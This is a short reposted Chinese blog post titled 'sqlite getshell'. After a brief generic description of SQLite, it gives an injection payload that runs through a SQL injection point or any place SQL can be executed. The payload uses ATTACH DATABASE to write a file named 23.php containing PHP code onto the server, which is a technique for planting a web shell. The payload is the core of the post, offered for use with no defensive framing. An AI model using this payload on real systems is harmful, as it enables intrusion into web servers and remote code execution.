标签:sql sqli 生成 values 语句 blog process 引擎 零配置
sqlite getshellSQLite是一个进程内的库,实现了自给自足的、无服务器的、零配置的、事务性的 SQL 数据库引擎。它是一个零配置的数据库,这意味着与其他数据库一样,您不需要在系统中配置。
就像其他数据库,SQLite 引擎不是一个独立的进程,可以按应用程序需求进行静态或动态连接。SQLite 直接访问其存储文件。
在存在sql注入或者是存在sql语句执行的地方执行一下代码:
ATTACH DATABASE ‘23.php‘ AS test ;create TABLE test.exp (dataz text) ; insert INTO test.exp (dataz) VALUES (‘<?php phpinfo()?>‘);会生成一个23.php,具体路径要根据实际情况而定,其代码就是<?php phpinfo()?>
标签:sql sqli 生成 values 语句 blog process 引擎 零配置
原文地址:http://blog.51cto.com/13770310/2131241
